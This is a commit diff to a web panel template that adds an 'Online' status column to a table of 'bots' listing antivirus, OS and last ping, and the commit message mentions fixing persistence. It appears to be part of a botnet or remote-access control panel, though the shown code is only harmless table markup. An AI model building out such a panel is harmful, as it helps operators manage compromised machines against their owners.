fix persistence and ping & added online information

--- a/panel/views/bots.hbs
+++ b/panel/views/bots.hbs
@@ -40,6 +40,7 @@
                                 <td>AV</td>
                                 <td>OS</td>
                                 <td>LASTPING</td>
+                                <td>Online</td>
                             </tr>
                         </thead>
                         <tbody>
@@ -51,6 +52,7 @@
                                 <td>{{av}}</td>
                                 <td>{{os}}</td>
                                 <td>{{toLocal lastPing}}</td>
+                                <td>{{{isOnline lastPing}}}</td>
                             </tr>
                             {{/each}}
                         </tbody>
